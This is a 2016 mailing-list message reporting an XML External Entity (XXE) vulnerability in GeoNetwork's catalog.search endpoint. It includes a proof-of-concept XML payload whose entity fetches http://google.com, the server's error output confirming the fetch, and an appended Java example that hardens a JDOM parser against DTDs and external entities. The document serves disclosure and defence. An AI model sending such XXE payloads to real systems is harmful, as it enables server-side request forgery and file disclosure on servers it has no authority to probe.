From: Mariano V. <mva...@co...> - 2016-12-28 17:50:26
Hi,

My name is Mariano Valderrey, and I have scanned my GeoNetwork with Acunetix and found an XML External Entity Injection vulnerability. I found that in GeoServer you have fixed the problem, and maybe I can use the solution for GeoNetwork 3.2. I wonder if you can help me with this.

Here is what I found:

https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing

**************

To confirm this I sent a specific request with this XML to the URL /geonetwork/srv/eng/catalog.search

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE request [
<!ENTITY include SYSTEM "http://google.com">
]>
<catalog.search>&include;</catalog.search>

And I received this result:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 400 Cannot build ServiceRequest
Cause : Error on line 1 of document http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</title>
</head>
<body><h2>HTTP ERROR 400</h2>
<p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason:
<pre> Cannot build ServiceRequest
Cause : Error on line 1 of document http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.3.11.v20160721</a><hr/>
</body>
</html>

******************

In the packet capture from the server I can see that it sends a request to http://google.com, and I found in the result that the server was redirected to www.google.com.ar. This confirms the vulnerability.

Sorry for my English,

Greetings and thank you so much.

--
Ing. en Sistemas Mariano Valderrey
Tel. (+54 11) 4331 0074 int. 5727
Unidad Base de Datos y Comunicaciones
Gerencia de Gestión Tecnológica
CONAE
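The error in the message above comes from `org.jdom.input.JDOMParseException`, so the request body is parsed with JDOM 1.x. The following is an added example, not part of the original message and not the GeoNetwork or GeoServer fix: one way to configure a JDOM 1.x `SAXBuilder` so that a request carrying a DOCTYPE is rejected before any entity is resolved. It assumes JDOM 1.x on the classpath and a Xerces-based SAX parser (including the JDK's built-in one); the class name, method names and sample requests are constructed for illustration.

```java
import java.io.IOException;
import java.io.StringReader;
import org.jdom.Document;
import org.jdom.JDOMException;
import org.jdom.input.SAXBuilder;

public class HardenedRequestParser {

    // Hypothetical helper: a SAXBuilder that refuses DTDs and external entities.
    static SAXBuilder newHardenedBuilder() {
        SAXBuilder builder = new SAXBuilder();
        // Primary control: any <!DOCTYPE ...> makes the parse fail outright.
        builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, in case DOCTYPEs ever have to be allowed again:
        // never fetch external general/parameter entities or external DTDs.
        builder.setFeature("http://xml.org/sax/features/external-general-entities", false);
        builder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        builder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // Keep entity references unexpanded in the resulting JDOM tree.
        builder.setExpandEntities(false);
        return builder;
    }

    // Returns true only if the request parses under the hardened settings.
    static boolean accepts(String xml) {
        try {
            Document doc = newHardenedBuilder().build(new StringReader(xml));
            return doc.hasRootElement();
        } catch (JDOMException | IOException e) {
            // A real service would log this and answer with a generic 400,
            // without echoing parser details back to the client.
            System.err.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed sample requests; the second has the same shape as the
        // request in the message, pointing at a non-resolvable placeholder host.
        String benign = "<?xml version=\"1.0\" encoding=\"utf-8\"?><catalog.search/>";
        String withDoctype = "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
                + "<!DOCTYPE request [<!ENTITY include SYSTEM \"http://example.invalid/\">]>"
                + "<catalog.search>&include;</catalog.search>";
        System.out.println("benign accepted: " + accepts(benign));
        System.out.println("DOCTYPE request accepted: " + accepts(withDoctype));
    }
}
```

A packet capture like the one described in the message is a good regression check: with these settings the server should make no outbound request when the DOCTYPE request is replayed.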